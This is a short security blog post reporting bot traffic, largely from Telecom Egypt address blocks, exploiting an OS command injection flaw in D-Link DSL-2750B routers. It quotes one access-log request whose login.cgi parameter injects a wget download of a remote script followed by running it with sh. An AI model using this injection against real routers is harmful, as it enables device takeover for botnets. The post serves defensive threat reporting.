Hakaied with love from Telecom Egypt

In the last two weeks I’ve seen a steady increase of bots trying to exploit a remote command execution flaw on D-Link routers. The majority of the attacks are originating from IP blocks belonging to Telecom Egypt Data.

The vulnerability, from what I understand is an old bug affecting D-Link firmware versions from 1.01 up to 1.03. Recently though, the flaw has been gathering some traction after being weaponized through MetaSploit.

MetaSploit - OS Command Injection

MetaSploit: D-Link DSL-2750B OS Command Injection.

From my experience, few companies will bother with patching network equipment so this will be yet another gift that keeps on giving. For the record, the list of bots and payload servers added to this post were extracted from a recent access log for paranoidpenguin.net.

Request: - - [03/Aug/2018:13:24:56 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://;sh%20/tmp/hk%27$ HTTP/1.1" "Hakai/2.0"

Payload script:

Hakai payload


Payload servers:

Hakai (user-agent): To destroy someone, or something.
According to the urban dictionary.